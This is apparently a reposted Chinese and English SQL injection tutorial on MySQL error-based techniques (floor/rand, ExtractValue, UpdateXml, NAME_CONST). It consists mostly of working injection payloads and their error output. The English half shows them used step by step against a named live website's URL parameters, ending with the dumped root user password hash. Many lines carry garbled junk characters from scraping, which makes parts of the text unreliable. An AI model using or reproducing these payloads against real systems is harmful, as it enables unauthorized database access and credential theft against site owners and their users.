mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

admin

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下：
首先进行正常查询：

mysql> select * from article where id = 1;
  i; l7 P, u/ S+—-+——-+———+
) `8 M0 l5 T3 h' R) [+ w) {| id | title | content |
+—-+——-+———+
|  1 | test  | do it   |
: m' j: [6 t" f; F+ X& s+—-+——-+———+

假如id输入存在注入的话，可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
* I% g- T) C  y: iERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。
( a8 K3 U5 L# S6 d/ p( `例如我们需要查询管理员用户名和密码：

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
* I- E  J! y  R$ t# D1 m$ k5 aERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

5 p5 x# q' K) z7 ^5 G% l; p1 k1 `
" l* r- m# a* W, v

再收集：

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

' [- F/ Z' C5 a$ D: [6 qErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
$ y7 P% r+ [+ p
; D  D  R$ j1 V3 i3 IErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′

MYSQL高版本报错注入技巧-利用NAME_CONST注入
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.


* \+ V2 a) W: \" v8 z2 |0 T/ m9 M$ ~相关信息
, k; O$ Y: X4 i, V4 B9 r* Z4 a+ ^7 C
, f4 V! [3 x/ i) {8 ?) s7 [: fNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
: o- c; p  f. G: j0 r  R
Code:
7 D, |2 u8 I3 X) h  u/ [% @NAME_CONST(DATA, VALUE)

1 y8 \- C- j8 `5 MReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)
% x9 H0 a( U+ J5 L7 _

6 M" T+ F" h9 B  C
4 d( {. v, Y! G/ A4 c|---------------|
9 m) {8 ^' d% F# T; f+ F|     TEST      |
|               |
|---------------|
* P- V1 S1 o9 ?/ h0 D|       1       |
- o5 r* m' S1 h- ~5 R+ Z6 }8 D|               |
|---------------|
4 S4 B+ v/ q) j' s6 `4 n% h/ j
. m2 D% U5 ]" S* }
4 D/ Z6 A4 H' O, h" ]* {& x
9 @& b$ G* P# g! t
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

) i8 \2 H9 D6 r- fOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.

) |$ i5 T/ T% _Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
2 _* J& `9 y! A/ W! C5 ?# Y

3 l8 D& R$ u' S5 L( z
# y9 x5 W. @' ^3 x& T, H

Code:
  v: v" z( @! d7 V8 c0 R* Aand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

) Y# R  f# u9 r$ U3 j6 U: E
VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

) y6 X4 z- E* ^5 M: \Let's try it out on my site..
6 y; g5 y/ ?: m( d7 z
Code:
( j5 k. W* n! C6 Z% lhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
: H9 u/ d: _3 }5 r/ _1 V5 W
Erroruplicate column name '5.0.27-community-nt'
" W' i9 H0 k. K; K
2 V& x1 g1 v0 y" f5 I: Z! e


  w. f9 p- ^% k4 H4 q3 m- Z: C- r
4 h1 F+ `! ?- dNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
/ s  r, v3 t1 r8 w$ {
Data Extraction

" u. u+ W, h9 |( ~, y: d# mCode:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
/ g9 Q5 Z  k4 z- ]& E

We should get a duplicate column 1 error...

- I' _, q1 p+ a5 U' t& bCode:
) E1 R8 f/ M% S! i' Q/ u& Lhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
' x: O' V$ y4 d1 C$ Q" [' a3 o. t
Erroruplicate column name '1
7 F6 V1 g9 d2 f. [
: \6 }7 ], X) i7 z+ m) c
. U0 q0 `. D& P' Q8 J4 g" U5 Y

$ \% ?! g( `, [2 L$ C5 x/ R
7 L5 \( r5 d  _  J/ @  P* {
) r  {9 {/ s& U2 S6 ~Now let's get the tables out this bitch..
0 t/ a3 ^; s* a
$ N" |/ H3 s' c+ [, P' Q' O9 q* WCode:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--


+ i; V& w9 I4 k( r" ~9 dLet's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
2 ^& Y/ d6 a0 f& U5 x
  N! @! }0 G2 k# N' m: J2 |
Erroruplicate column name 'com_admanage

% c2 N% v6 Z. U  U! n



# G" k4 ]# b$ b9 Q+ q
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

1 m: G$ |- R" l' C  q. o4 c/ }% Z* WLet's get the columns out of the user table..

; P9 H0 U$ c/ ~% r# b# \; dCode:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

. E0 N( u: i1 ^8 M# L: \- n& ~
So mine looks like this, and I get the duplicate column name 'Host'.

2 _& N1 s$ D) x6 N  rCode:
( @; X; f/ T1 G( m+ _http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

1 {# \' `  H( U# WErroruplicate column name 'Host'




5 z" q8 j% N% x

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

- l9 U% p" G% g$ n7 L
) b* ^( `9 B- ]- K5 y2 _4 M9 gSo mine looks like this...

Code:
: N& Z2 @" Z* y, C- _http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
5 V) d+ Q/ j" U7 J7 E: I
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

6 |% Y4 n9 m5 J% n) R$ o9 F- f6 S  ~
9 \; L* s" d& w6 _1 q) X0 B: v
$ `1 O# T. Z, q0 t. k" q3 |

- f7 a7 A- W% K9 v6 c9 U& q3 Y: `
And there we have it, thanks for reading.

/ E$ e3 l8 t! H/ A- Q, k7 l